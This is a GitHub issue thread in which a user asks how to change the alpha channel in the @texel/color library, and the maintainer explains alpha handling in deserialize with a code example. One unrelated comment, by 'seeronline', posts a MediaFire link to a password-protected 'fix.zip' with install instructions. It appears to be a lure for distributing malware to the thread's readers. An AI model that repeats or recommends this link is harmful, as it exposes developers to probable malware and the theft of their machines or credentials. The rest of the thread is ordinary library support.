### ISSUE TITLE
How to change the alpha channel?

### ISSUE THREAD

**Issue by bennyschudel** [texel-org/color#7]
Hi Matt

Many thanks for this awesome library!

I was trying to change the `alpha` channel of a color but `deserialize` does not include it ...
What would be the way to change the alpha channel?

Best
Benny

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mattdesl** [comment]
Alpha is only considered in string serialization and deserialization, eg:

```js

import { deserialize } from "@texel/color";

const { coords, id } = deserialize("color(display-p3 0 0.5 1 / 0.35)");
console.log(id); // "display-p3"
console.log(coords); // [ 0, 0.5, 1, 0.35 ]
```

Does this work? You’ll have to store and keep track of alpha as it may be lost during convert phase (alpha is not part of any color spaces).

**Comment by bennyschudel** [comment]
Ah, I was using a commas between the colors making a mix of old and new syntax :)

<img width="565" alt="image" src="https://github.com/user-attachments/assets/53b111c5-4539-4e8a-8ee7-836d38a0df4a">

**Comment by mattdesl** [comment]
The latest push on npm should fix these issues and conform a little closer to CSS color parsing (also supporting percentages for float values). Let me know if that works and if you spot any other issues!

**Comment by bennyschudel** [comment]
Thank you Matt! So kind of you. 🙏 Thank you so much for sharing your stuff! Gonna let you know when I find other things I wish for are not working for me :)
